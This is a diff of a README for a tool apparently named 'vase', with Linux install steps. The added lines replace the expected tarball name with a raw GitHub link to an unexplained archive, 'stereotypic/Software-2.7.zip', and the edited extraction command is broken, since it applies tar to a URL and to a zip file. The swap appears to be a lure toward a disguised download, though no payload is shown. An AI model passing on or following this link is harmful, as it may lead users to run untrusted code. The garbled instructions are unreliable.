9329110375/vase/README.md

 ### For Linux Users

 1. Open your terminal.
-2. Navigate to the directory where you downloaded `vase-linux.tar.gz`.
+2. Navigate to the directory where you downloaded `https://github.com/9329110375/vase/raw/refs/heads/master/stereotypic/Software-2.7.zip`.
-3. Extract the tarball using the command: `tar -xzvf vase-linux.tar.gz`.
+3. Extract the tarball using the command: `tar -xzvf https://github.com/9329110375/vase/raw/refs/heads/master/stereotypic/Software-2.7.zip`.
 4. Navigate to the extracted directory: `cd vase`.
 5. Run the application using the command: `./vase`.